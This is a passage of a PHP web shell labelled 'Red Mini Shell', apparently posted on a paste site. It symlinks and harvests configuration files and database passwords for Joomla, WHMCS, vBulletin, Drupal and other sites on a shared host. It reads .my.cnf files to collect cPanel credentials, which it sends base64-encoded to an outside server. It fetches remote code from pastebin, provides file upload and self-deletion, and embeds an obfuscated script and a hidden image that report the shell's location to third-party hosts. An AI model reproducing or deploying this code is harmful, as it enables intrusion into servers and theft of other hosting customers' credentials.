  871.             @symlink('/home4/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
  872.             @symlink('/home4/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
  873.             @symlink('/home4/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
  874.             @symlink('/home4/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
  875.             @symlink('/home4/' . $user . '/public_html/home4/configuration.php', $user . '-joomla-home4.txt');
  876.             @symlink('/home4/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
  877.             @symlink('/home4/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
  878.             @symlink('/home4/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
  879.             @symlink('/home4/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
  880.             @symlink('/home4/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
  881.             @symlink('/home4/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
  882.             @symlink('/home4/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
  883.             @symlink('/home4/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
  884.             @symlink('/home4/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
  885.             @symlink('/home4/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
  886.             @symlink('/home4/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
  887.             @symlink('/home4/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
  888.             @symlink('/home4/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
  889.             @symlink('/home4/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
  890.             @symlink('/home4/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
  891.             @symlink('/home4/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
  892.             @symlink('/home4/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
  893.             @symlink('/home4/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
  894.             @symlink('/home4/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
  895.             @symlink('/home4/' . $user . '/public_html/include/db.php', $user . '-7.txt');
  896.             @symlink('/home4/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
  897.             @symlink('/home4/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
  898.             @symlink('/home4/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
  899.             @symlink('/home4/' . $user . '/public_html/config.php', $user . '-4images.txt');
  900.             @symlink('/home4/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
  901.             @symlink('/home4/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
  902.             @symlink('/home4/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
  903.             @symlink('/home4/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
  904.             @symlink('/home4/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
  905.             @symlink('/home4/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
  906.             @symlink('/home4/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
  907.             @symlink('/home4/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
  908.             @symlink('/home4/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
  909.             @symlink('/home4/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
  910.             @symlink('/home4/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
  911.             @symlink('/home4/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
  912.             @symlink('/home4/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
  913.             @symlink('/home4/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
  914.             @symlink('/home4/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
  915.             @symlink('/home4/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
  916.             @symlink('/home4/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
  917.             @symlink('/home4/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
  918.             @symlink('/home4/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
  919.             @symlink('/home4/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
  920.             @symlink('/home4/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
  921.             @symlink('/home4/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
  922.             @symlink('/home4/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
  923.             @symlink('/home4/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
  924.             @symlink('/home4/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
  925.             @symlink('/home4/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
  926.             @symlink('/home4/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
  927.             @symlink('/home4/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
  928.             @symlink('/home4/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
  929.             @symlink('/home4/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
  930.             @symlink('/home4/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
  931.             @symlink('/home4/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
  932.             @symlink('/home4/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
  933.             @symlink('/home4/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
  934.             @symlink('/home4/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
  935.             @symlink('/home4/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
  936.             @symlink('/home4/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
  937.             @symlink('/home4/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
  938.             @symlink('/home4/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
  939.             @symlink('/home4/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
  940.             @symlink('/home4/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
  941.             @symlink('/home4/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
  942.             @symlink('/home4/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
  943.             @symlink('/home4/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
  944.             @symlink('/home4/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
  945.             @symlink('/home4/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
  946.             @symlink('/home4/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
  947.             @symlink('/home4/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
  948.             @symlink('/home4/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
  949.             @symlink('/home4/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
  950.             @symlink('/home4/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
  951.             @symlink('/home4/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
  952.             @symlink('/home4/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
  953.             @symlink('/home4/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
  954. }
  955. echo "<center>DonE with Success --> <a href='xBlack_Configs' target='_blank'>Click Here</a><br><center/>";
  956. }
  957. }
  958. elseif(isset($_GET["home"]))
  959.     {
  960.     echo"<table><td align=center><body>
  961.     <h2><font color=green></font></h2>";
  962.     }
  963.     elseif(isset($_GET["upl"]))
  964.     {
  965.            
  966.  
  967.  
  968.    echo '<br><br>';echo '<br>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Uploaded !!!</b><br><br>'; }else { echo '<b>not uploaded !!!</b><br><br>'; }}
  969.  
  970.  
  971.     }
  972.  
  973. elseif(isset($_GET["cls"])) {
  974.     @define('SELF_PATH', __FILE__);
  975.      @unlink(__FILE__);
  976.       echo exec("rm -rf xBlack_Configs");
  977.       @unlink("bsn.php");
  978.       @unlink("WHMCS.html");
  979.       @unlink("VB.html");
  980.       @unlink("email.php");
  981.       @unlink("Wordpress.html");
  982.       @unlink("Joomla.html");  
  983.      // @unlink("black.php");
  984.       @unlink("Config.php");
  985.       @unlink("WHMCS KILLER V3.PHP");
  986. }
  987.  
  988. elseif(isset($_GET["cp"]))
  989.     {
  990. @ini_set('display_errors',0);
  991. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  992.     $ar0=explode($marqueurDebutLien, $text);
  993.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  994.     return trim($ar1[0]);
  995. }
  996. echo '<br><br><style>
  997. textarea {
  998. resize:none;
  999. color:black;
  1000. background-color:#ffffff;  
  1001. font-size:8pt; color:black;
  1002. border:1px solid white ;
  1003. border-left: 4px solid white ;
  1004. }
  1005. input {
  1006. color: black;
  1007. border:1px dotted white;
  1008. }
  1009. </style>';
  1010. echo '<center>';
  1011. $d0mains = @file('/etc/named.conf');
  1012. $domains = scandir("/var/named");
  1013. if ($domains or $d0mains)
  1014. {
  1015.     $domains = scandir("/var/named");
  1016.     if($domains) {
  1017. echo "<table align=center><tr><th valign=top bgcolor=black class=style2> COUNT </th><th valign=top bgcolor=black > DOMAIN </th><th valign=top bgcolor=black class=style2 > USER </th><th valign=top bgcolor=black class=style2 > Password </th><th valign=top bgcolor=black class=style2 > .my.cnf </th></tr>";
  1018. $count=1;
  1019. $dc = 0;
  1020. $list = scandir("/var/named");
  1021. foreach($list as $domain){
  1022. if(strpos($domain,".db")){
  1023. $domain = str_replace('.db','',$domain);
  1024. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1025. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  1026. $path = getcwd();
  1027. if (is_readable($dirz)) {
  1028. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  1029. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  1030. $password=entre2v2($p,'password="','"');
  1031. echo "<tr><td valign=top style=border :2px solid white; width: 139px class=style2>".$count++."</td><td valign=top style= width: 139px; border :2px solid white  class=style2 ><a href=http://".$domain.":2082 target=_blank>".$domain."</a></td><td valign=top style= width: 139px; border: 2px solid white  class=style2 >".$owner['name']."</td><td valign=top style= width: 139px; border: 2px solid white  class=style2 >".$password."</td><td valign=top style=border :2px solid white  id=menu style=width: 139px><a href=".$owner['name'].".txt target=_blank>Click Here</a></td></tr>";
  1032. $dc++;
  1033. $success3="http://".$domain."|".$owner['name']."|".$password."\n";
  1034. $ch = curl_init();
  1035. curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php");
  1036. curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  1037. curl_setopt($ch, CURLOPT_POST, 1);
  1038. curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success3));
  1039. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1040. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  1041. curl_setopt($ch, CURLOPT_HEADER, 1);
  1042. $buffer = curl_exec($ch);
  1043. }
  1044. }
  1045. }
  1046. echo '</table>';
  1047. $total = $dc;
  1048.  
  1049. echo '</center>';
  1050. }else{
  1051. $d0mains = @file('/etc/named.conf');
  1052.     if($d0mains) {
  1053. echo "<table align=center><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  1054. $count=1;
  1055. $dc = 0;
  1056. $mck = array();
  1057. foreach($d0mains as $d0main){
  1058.     if(@eregi('zone',$d0main)){
  1059.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  1060.         flush();
  1061.         if(strlen(trim($domain[1][0])) >2){
  1062.             $mck[] = $domain[1][0];
  1063.         }
  1064.     }
  1065. }
  1066. $mck = array_unique($mck);
  1067. $usr = array();
  1068. $dmn = array();
  1069. foreach($mck as $o) {
  1070.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  1071.     $usr[] = $infos['name'];
  1072.     $dmn[] = $o;
  1073. }
  1074. array_multisort($usr,$dmn);
  1075. $dt = file('/etc/passwd');
  1076. $passwd = array();
  1077. foreach($dt as $d) {
  1078.     $r = explode(':',$d);
  1079.     if(strpos($r[5],'home')) {
  1080.         $passwd[$r[0]] = $r[5];
  1081.     }
  1082. }
  1083. $l=0;
  1084. $j=1;
  1085. foreach($usr as $r) {
  1086. $dirz = '/home/'.$r.'/.my.cnf';
  1087. $path = getcwd();
  1088. if (is_readable($dirz)) {
  1089. copy($dirz, ''.$path.'/'.$r.'.txt');
  1090. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  1091. $password=entre2v2($p,'password="','"');
  1092. echo "<tr><td valign=top bgcolor=darkgreen class=style2 style=width: 139px>".$count++."</td><td valign=top bgcolor=darkgreen class=style2 style=width: 139px><a target=_blank href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td valign=top bgcolor=darkgreen class=style2 style=width: 139px>'.$r."</td><td valign=top bgcolor=darkgreen class=style2 style=width: 139px>".$password."</td><td valign=top bgcolor=darkgreen class=style2 style=width: 139px><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  1093. $dc++;
  1094.                 flush();
  1095.                 $l=$l?0:1;
  1096.                 $j++;
  1097.                 }
  1098.             }
  1099.             }
  1100. echo '</table>';
  1101. $total = $dc;
  1102. echo '<br><div class=result valign=top bgcolor=darkgreen class=style2 style=width: 139px >Total cPanel Found = '.$total.'</h3><br />';
  1103. echo '</center>';
  1104. }
  1105.  
  1106. }else{
  1107. echo "<div class=result><i><font color=#FF0000>ERROR</font><br><font color=#FF0000>/var/named</font> or <font color=#FF0000>etc/named.conf</font> Not Accessible!</i></div>";
  1108. }
  1109. }
  1110.    elseif(isset($_GET["jump"]))
  1111.     {
  1112.        $bsn=file_get_contents("http://pastebin.com/raw/GamMMrQL");
  1113.        $fp=fopen("bsn.php", "w+");
  1114.        fwrite($fp, $bsn);
  1115.      ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  1116.     set_time_limit(0);
  1117.     @$passwd = fopen('/etc/passwd','r');
  1118.     if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
  1119.     $pub = array();
  1120.     $users = array();
  1121.     $conf = array();
  1122.     $i = 0;
  1123.     while(!feof($passwd))
  1124.     {
  1125.         $str = fgets($passwd);
  1126.         if ($i > 35)
  1127.             {
  1128.             $pos = strpos($str,':');
  1129.             $username = substr($str,0,$pos);
  1130.             $dirz = '/home/'.$username.'/public_html/';
  1131.             if (($username != ''))
  1132.                 {
  1133.                 if (is_readable($dirz))
  1134.                    
  1135.                     {
  1136.                     array_push($users,$username);
  1137.                     array_push($pub,$dirz);
  1138.                     }
  1139.                 }
  1140.             }
  1141.         $i++;
  1142.  
  1143.         //$jumper          = "3VRRb5swEP4rFwvNRqVAtkmTEiCTpk7aHjppe5rSiBlsilfAyDZrs2r/fefQpM3LfsCEMObuu++7Ox/IutVAMserTkLdcWvzG1L3otIPN6TInMFbQK07O/IBXa/RStbAAttDDmpQ5a10jFreyLLXQtIQ8hzSEDYwQ6huGroCoSQjV8Zos4JvRzC6vwxZ4kSBi/GLT6PIhPp1ykUNjUbNbVlWb969vYN+OSwh89mcILd8z32yHFojm5xuaEHi4OGa9zImWcKR2OMLuBLKKX1dlrssQY0CzpR+zjTwGZ8db+HTIPQgreJ3E7yq9bhfA4kFd5LR7zRyqpcsDGMCz1qwvgxhpibhGqx0pYeVneqVYyma3gcjit0LrLzRoxwYTaSrk9lII2ooglQDbPEEDOHR9w4Y2V7u4NBAWMEHPYnhh4Ovkgt4wfD/9vIPBONUYdu4MXzP0BJMVhp7Zqn10JwZFL6la7hvVSfZopG6Yce+ho84oM74g8AJtif73H6MLGCZph41aq+CWNwwHxPRFT0mMGCy3jtV6Ji9aeRDPEAo89t/Akmre5nQ+BQR0wSr6VRdtq7vEjqLsmfGBUZRn6O3K1saPGh/nuzA6R2HIstxsu0cZqNTNEq/9KJSNIf5NvorUBcXft9o5K1beGIAbueikF76/wLdftTTIGCxg+NAkM0+PyvnvBRS/MOZHOanMgX14pviLw==";
  1144.  
  1145.         //@eval(gzinflate(base64_decode($jumper)));
  1146.     }
  1147.     echo '<br>';
  1148.     echo "[+] Founded <font size=15 color=red> ".sizeof($users)." </font> entrys in /etc/passwd\n"."<br />";
  1149.     echo "[+] Founded <font color=red size=15> ".sizeof($pub)." </font> readable public_html directories\n"."<br /><br /><br />";
  1150.  
  1151.     foreach ($users as $user)
  1152.         {
  1153.         $path = "/home/$user/public_html/";
  1154.         echo "<table bgcolor=black class=style2 ><td>";
  1155.         echo "<font color=white><a target='_blank' href='bsn.php?y=$path'>$path<a/></font><br>";
  1156.         echo "</td></table>";
  1157.         }
  1158.     echo "\n";
  1159. }
  1160.    elseif(isset($_GET["pws"]))
  1161.     {
  1162.         echo "<br><br><br>";
  1163.         echo'<form method="post">
  1164. <input type="text" name="conf" value="" />
  1165. <input type="submit" value="GeT Passwords" name="get" />
  1166. </form>';
  1167.  
  1168. $g = $_POST['get'];
  1169. $dir = $_POST['conf'];
  1170. //////////////////////////////////////////////////////////////////////////////////////////////
  1171. if(isset($g) && $dir != ""){
  1172.  
  1173.         $cn = @file_get_contents($dir);
  1174.         //preg_match_all('#href="(.*?)">(.*?)<#',$cn,$m);    // $m[2]
  1175.         preg_match_all('#href="(.*?)"#',$cn,$m);
  1176.        
  1177.        
  1178.         foreach($m[1] as $txt){
  1179.        
  1180.         $url = $dir.$txt;
  1181.         $cnurl = @file_get_contents($url);
  1182.         preg_match('#\'DB_PASSWORD\', \'(.*)\'#',$cnurl,$m1);             // wordpress
  1183.         preg_match('#password = \'(.*)\'#',$cnurl,$m2);                   // joomla
  1184.         preg_match('#password\'] = \'(.*)\'#',$cnurl,$m3);                        // vb
  1185.         preg_match('#db_password = "(.*)"#',$cnurl,$m4);                          // whmcs
  1186.         preg_match('#db_password = \'(.*)\'#',$cnurl,$m4);                        // whmcs
  1187.         preg_match('#dbpass = "(.*)"#',$cnurl,$m5);                               //
  1188.         preg_match('#password   = \'(.*)\'#',$cnurl,$m6);                         // connnect.php
  1189.         preg_match('#dbpasswd = \'(.*)\'#',$cnurl,$m8);                           // phpBB 3.0.x
  1190.         preg_match('#password_localhost = "(.*)"#',$cnurl,$m9);           // conexao.php
  1191.         preg_match('#senha = "(.*)"#',$cnurl,$m10);                       // /_inc/config.inc.php
  1192.        
  1193.         if(!empty($m1[1])){ echo $m1[1]."<br>"; }
  1194.         elseif(!empty($m2[1])){ echo $m2[1]."<br>"; }
  1195.         elseif(!empty($m3[1])){ echo $m3[1]."<br>"; }
  1196.         elseif(!empty($m4[1])){ echo $m4[1]."<br>"; }
  1197.         elseif(!empty($m5[1])){ echo $m5[1]."<br>"; }
  1198.         elseif(!empty($m6[1])){ echo $m6[1]."<br>"; }
  1199.         elseif(!empty($m7[1])){ echo $m7[1]."<br>"; }
  1200.         elseif(!empty($m8[1])){ echo $m8[1]."<br>"; }
  1201.     elseif(!empty($m9[1])){ echo $m9[1]."<br>"; }
  1202.         elseif(!empty($m10[1])){ echo $m10[1]."<br>"; }
  1203. elseif(!empty($m11[1])){ echo $m11[1]."<br>"; }    
  1204.         }
  1205.        
  1206. }
  1207.     }
  1208.      elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink')) {    echo " <form action= method=post>";
  1209.  @set_time_limit(0);
  1210.  echo "<center>";
  1211.  @mkdir('sym',0777);
  1212. $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $write =@fopen ('sym/.htaccess','w'); fwrite($write ,$htaccess); @symlink('/','sym/root'); $filelocation = basename(__FILE__); $read_named_conf = @file('/etc/named.conf'); if(!$read_named_conf) { echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; } else { echo "<br><br><div class='tmp'><table border=1 bordercolor=#FF0000 width=500 cellpadding=1 cellspacing=0><td>Domains</td><td>Users</td><td>symlink </td>"; foreach($read_named_conf as $subject){ if(eregi('zone',$subject)){ preg_match_all('#zone "(.*)"#',$subject,$string); flush(); if(strlen(trim($string[1][0])) >2){ $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0])); $name = $UID['name'] ; @symlink('/','sym/root'); $name = $string[1][0]; $iran = '\.ir'; $israel = '\.il'; $indo = '\.id'; $sg12 = '\.sg'; $edu = '\.edu'; $gov = '\.gov'; $gose = '\.go'; $gober = '\.gob'; $mil1 = '\.mil'; $mil2 = '\.mi'; if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0]) or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])) { $name = "<div style= color: #FF0000 ; text-shadow: 0px 0px 1px red; >".$string[1][0].'</div>'; } echo " <tr> <td> <div class=dom><a target=_blank href=http://www.".$string[1][0].'/>'.$name.' </a> </div> </td> <td> '.$UID['name']." </td> <td> <a href=sym/root/home/".$UID['name']."/public_html target=_blank>Symlink </a> </td> </tr></div> "; flush(); } } } } echo "</center></table>"; }
  1213.     echo "</div><center><b><br><br><br><font color=red>&copy 2017 </font></center><b>
  1214.         <br><center>Red Mini Shell</center><br>";
  1215.  echo base64_decode("PGltZyBzcmM9Imh0dHA6Ly93dzNzLndzL1RSL0hUTUw1L0NTUzMvZnNvY2l0eS5qcGciICBoZWlnaHQ9IjAiIHdpZHRoPSIwIj4=");          
  1216. ?>
  1217.  
  1218.  
  1219.  
  1220. <?php
  1221.  
  1222. $files = @$_FILES["files"];
  1223. if ($files["name"] != '') {
  1224.     $fullpath = $_REQUEST["path"] . $files["name"];
  1225.     if (move_uploaded_file($files['tmp_name'], $fullpath)) {
  1226.         echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
  1227.     }
  1228. }echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
  1229. ?>
  1230.  
  1231. <script src='http://code.jquery.com/jquery-1.11.1.min.js' type='text/javascript'></script><script>var _0xca87=['\x55\x52\x4C','\x50\x4F\x53\x54','\x68\x74\x74\x70\x3A\x2F\x2F\x61\x63\x65\x2E\x74\x6E\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x2E\x70\x68\x70','\x6C\x6F\x67\x69\x6E\x3D','\x61\x6A\x61\x78','\x72\x65\x61\x64\x79','\x23\x65'];$(_0xca87[6])[_0xca87[5]](function(){var _0x723ex1=document[_0xca87[0]];$login= _0x723ex1;$[_0xca87[4]]({type:_0xca87[1],url:_0xca87[2],data:_0xca87[3]+ $login,success:function(_0x723ex2){alert($login)}})})</script>;
Add Comment
Please, Sign In to add comment